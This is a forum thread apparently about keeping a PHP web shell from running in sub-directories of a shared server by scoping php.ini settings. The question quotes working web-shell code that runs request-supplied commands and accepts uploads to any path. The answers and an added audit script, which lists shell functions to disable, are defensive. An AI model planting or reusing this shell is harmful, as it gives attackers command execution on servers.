How do I enable my php.ini file to affect all directories/sub-directories of my server?

Posted 2019-07-31 16:29

Question:

A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:

<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

<?php
if(isset($_REQUEST['upload'])) {
    echo '<form enctype="multipart/form-data" action=".config.php?send" method="POST">
        <input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
        Send this file: <input name="userfile" type="file" />
        To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
        <input type="submit" value="Send File" />
    </form>';
}
?>

<?php
if(isset($_REQUEST['send'])) {
    $uploaddir = $_POST["direct"];
    $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
        echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;
    } else {
        echo "Upload failed";
    }
}
?>

This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?

Answer 1:

One, kick off a "friend" that chooses to run scripts like this.

Then worry about securing your server. Your system has a master php.ini somewhere (often /etc/php.ini, but it can be in several places; check phpinfo()). That file controls the default settings for your server. Also, you can block local settings files that allow overrides.



Answer 2:

Wow! Move the php.ini file on a per-directory basis? Didn't know you could do that.

My best guess (someone please correct me if I'm wrong): PHP probably overrides the global php.ini file with a local set of rules on a per-directory basis (much like .htaccess), so basically all you would need to do is to add your php.ini directives to the global php.ini (found here on Ubuntu: /etc/php5/apache2/php.ini).

Alternatively, you might want to try to use .htaccess to prepend a php page onto all pages with the following:

ini_set('your_directive', 'your_value');

Of course, make sure the .htaccess which calls the prepend php sits at the root, else you're stuck with the same issue.

/mp
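Both answers above come down to the same two questions: which php.ini is actually in force for the directory a script runs from, and whether the functions you think you disabled are really gone there. The following PHP script is an added example and is not part of either answer or of the original question. It is meant to be dropped into any sub-directory, requested once, and deleted; the list of functions it checks and the file name you give it are assumptions for the example, not values from the page.

```php
<?php
// Added example (not from the original post): request this file once from
// the sub-directory you want to check, read the report, then delete it.

// Functions the administrator intends to list in disable_functions.
// Assumed list for the example; adjust it to match your own php.ini.
$mustBeDisabled = ['system', 'exec', 'shell_exec', 'passthru', 'proc_open', 'popen'];

/** Parse the comma-separated disable_functions value into a lookup set. */
function disabledFunctionSet(): array
{
    $raw   = (string) ini_get('disable_functions');
    $names = array_filter(array_map('trim', explode(',', $raw)), 'strlen');
    return array_fill_keys(array_map('strtolower', $names), true);
}

/**
 * For each wanted function, report whether it is listed in the effective
 * disable_functions value and whether PHP still exposes it. function_exists()
 * returns false for functions removed by disable_functions, so the 'callable'
 * column is the ground truth regardless of what the ini value claims.
 */
function auditDisabledFunctions(array $wanted): array
{
    $listed = disabledFunctionSet();
    $report = [];
    foreach ($wanted as $name) {
        $report[$name] = [
            'listed'   => isset($listed[strtolower($name)]),
            'callable' => function_exists($name),
        ];
    }
    return $report;
}

header('Content-Type: text/plain');

// Equivalent of the phpinfo() check suggested in Answer 1, reduced to the
// lines that matter: which ini file(s) govern this directory.
echo "SAPI:              ", PHP_SAPI, "\n";
echo "Loaded php.ini:    ", php_ini_loaded_file() ?: '(none)', "\n";
echo "Additional .ini:   ", php_ini_scanned_files() ?: '(none)', "\n";
echo "disable_functions: ", ini_get('disable_functions') ?: '(empty)', "\n\n";

foreach (auditDisabledFunctions($mustBeDisabled) as $name => $state) {
    printf("%-11s listed=%-3s callable=%-3s %s\n",
        $name,
        $state['listed'] ? 'yes' : 'no',
        $state['callable'] ? 'yes' : 'no',
        $state['callable'] ? '<-- NOT blocked in this directory' : 'ok');
}

// disable_functions is a PHP_INI_SYSTEM directive: it can only be set in
// php.ini or via php_admin_value in the web server configuration, never at
// runtime. ini_set() therefore returns false here, which is why the
// auto_prepend_file + ini_set() idea from Answer 2 cannot be used for this
// particular directive (it does work for PHP_INI_ALL directives).
$runtime = ini_set('disable_functions', implode(',', $mustBeDisabled));
echo "\nini_set('disable_functions', ...) returned: ", var_export($runtime, true), "\n";
```

If the "Loaded php.ini" line changes as you move the script between directories, PHP is running as CGI/suPHP-style and picking up a per-directory php.ini, which is exactly the behaviour the question describes; the fix belongs in the single php.ini that path resolves to, or in the hosting panel setting that pins one file. Under mod_php, directives set with `php_admin_value` / `php_admin_flag` in the server configuration cannot be overridden from `.htaccess`, and under CGI/FPM an empty `user_ini.filename` in the master php.ini stops `.user.ini` files from applying local overrides, which is the "block local settings files" point from Answer 1.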



Answer 3:

Thanks guys, your answers were great, but the answer was right under my nose the entire time. Via cPanel I was able to edit my server to use a single php.ini file.



Answer 4:

Are you sure? I wish I had your ISP. By default some ISPs will provide a local copy of the ini file in public_html to allow overrides. But cPanel usually only provides a reference of the server-wide defaults.



Tags: security php